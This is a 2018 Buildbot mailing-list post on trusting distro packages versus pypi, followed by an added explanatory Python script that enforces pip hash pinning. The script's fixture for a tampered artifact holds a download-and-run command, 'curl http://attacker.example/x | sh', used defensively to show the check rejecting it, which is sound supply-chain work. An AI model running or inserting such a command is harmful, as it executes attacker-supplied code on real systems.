[users at bb.net] debian packages?

Dan Kegel dank at kegel.com
Tue Feb 27 20:38:07 UTC 2018

On Tue, Feb 27, 2018 at 12:03 PM, Bill Deegan <bill at baddogconsulting.com> wrote:
> On Tue, Feb 27, 2018 at 12:43 PM, Dan Kegel <dank at kegel.com> wrote:
>> > Any reason you wouldn't use virtualenv and pip install for your buildbot
>> > install needs?
>> It is inherently dangerous to trust third party package repositories.
>> I would like my build machines to be capable of running builds
>> without randomly downloading crap from this, that, and the other
>> marginally trustable third party collection of packages.
>> Since I'm running Ubuntu, I already trust that one repository,
>> and I'd like to draw the line there.
> That's a pretty restrictive point of view, but if that suits your security
> requirements.
> You do realize that the debian packages are built from the same sources the
> pypi packages are (minus some minor packaging changes).  So in some sense
> the debian package is a third party package vs pypi (the primary
> distribution point for buildbot packages)

I trust ubuntu's curation and vulnerability patching more than I trust
pypi, which has a "sure, upload whatever crap you like" policy, IIRC.
Some adult supervision by a professional distro like Ubuntu or RH
seems appropriate if you care about security.

> Buildbot (historically) has pretty good development pace and if you're stuck
> with only the debian packages of such you'll be out of date, and missing
> some nice improvements  (performance, security issues, and feature wise)

That's ok.  I trust Ubuntu to provide commonly needed security fixes
for python modules.
And I'm happy with a time-based release rhythm rather than a rolling
release for my dependencies.

> In general I agree that adding debian repos willy-nilly is not a wise move,
> installing from pypi using pip (at least for buildbot) is not as much of a
> risk.

Given e.g. https://arstechnica.com/information-technology/2017/09/devs-unknowingly-use-malicious-modules-put-into-official-python-repository/
I would hope it's not just me.

I realize that insisting on security seriously impedes productivity.
Many developers would not be able to get their job done promptly
if they did not implicitly trust repositories like pypi and npm.
And I expect I will have to compromise on this frequently in the name
of getting things shipped.

From time to time, the software I'm building/packaging has to pass
security audits from new customers, and you never know how
picky they're going to be... one of them someday is going to ask
tough questions, and might have a bias towards trusting RHEL or Ubuntu
and nothing else.  Stranger things have happened.

Anyway, that's why I'm happy that someone is working on debian
packages for buildbot!
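The exchange above treats "pip install from pypi" as an all-or-nothing trust decision. Where pypi is used anyway, the check a practitioner would add is pip's hash pinning: every requirement carries an exact version and a `--hash=sha256:` digest, and `pip install --require-hashes` refuses anything that does not match, so a tampered or look-alike upload fails even if the index serves it under the expected name. The script below is an added, offline illustration of that policy; it is not code from this thread or from the Buildbot project, and the package name, version string, requirements text and "wheel" bytes are constructed for the example.

```python
"""Offline check that every pip requirement is pinned to an exact version and a
sha256 digest, and that a locally fetched artifact matches one of those digests.

This mirrors the policy pip enforces with `pip install --require-hashes`.
The requirements text and artifact bytes are constructed for the example and
do not correspond to any real release.
"""
import hashlib
import re

# One requirement per line: name==version followed by one or more --hash options.
# Backslash line continuations (also accepted by pip) are not handled here.
REQ_LINE = re.compile(
    r"^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)==(?P<version>[^\s\\]+)"
    r"(?P<hashes>(?:\s+--hash=sha256:[0-9a-f]{64})+)\s*$"
)


def parse_requirements(text):
    """Return {name: (version, {sha256 digests})}.

    Raise ValueError on any line that is not fully pinned (no '==' version or
    no --hash), because an unpinned line lets the resolver install whatever
    the index currently serves under that name.
    """
    pinned = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = REQ_LINE.match(line)
        if not m:
            raise ValueError(f"unpinned or malformed requirement: {raw!r}")
        hashes = set(re.findall(r"sha256:([0-9a-f]{64})", m.group("hashes")))
        pinned[m.group("name").lower()] = (m.group("version"), hashes)
    return pinned


def verify_artifact(pinned, name, data):
    """True iff the bytes of a downloaded wheel/sdist for `name` match a pinned digest.

    A tampered or typosquatted upload has a different digest (or an unknown
    name) and is rejected even when the filename looks right.
    """
    entry = pinned.get(name.lower())
    if entry is None:
        return False
    return hashlib.sha256(data).hexdigest() in entry[1]


# Constructed stand-ins for downloaded wheels (not real Buildbot releases).
GOOD_WHEEL = b"PK\x03\x04 buildbot-1.1.0 constructed wheel contents"
TAMPERED_WHEEL = GOOD_WHEEL + b"; curl http://attacker.example/x | sh"
GOOD_DIGEST = hashlib.sha256(GOOD_WHEEL).hexdigest()

# Constructed requirements file with the digest of the "good" artifact pinned.
REQUIREMENTS = f"""
# pinned for a build worker; digest is of the constructed artifact above
buildbot==1.1.0 --hash=sha256:{GOOD_DIGEST}
"""

# A loose specifier like this is exactly what the policy must reject.
UNPINNED = "buildbot>=1.0\n"


def run_checks():
    """Exercise the policy on the constructed inputs and return the outcomes."""
    pinned = parse_requirements(REQUIREMENTS)
    results = {
        "good": verify_artifact(pinned, "buildbot", GOOD_WHEEL),
        "tampered": verify_artifact(pinned, "buildbot", TAMPERED_WHEEL),
        "lookalike_name": verify_artifact(pinned, "buidlbot", GOOD_WHEEL),
    }
    try:
        parse_requirements(UNPINNED)
        results["unpinned_rejected"] = False
    except ValueError:
        results["unpinned_rejected"] = True
    return results


if __name__ == "__main__":
    for check, outcome in run_checks().items():
        print(f"{check}: {outcome}")
```

In practice the digests come from `pip download` followed by `pip hash` (or from a tool that writes hashed requirements), and the check runs as `pip install --require-hashes -r requirements.txt`; the point of the script is to make visible what that flag rejects: an unpinned line, a changed artifact, and a name that is not in the pinned set.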
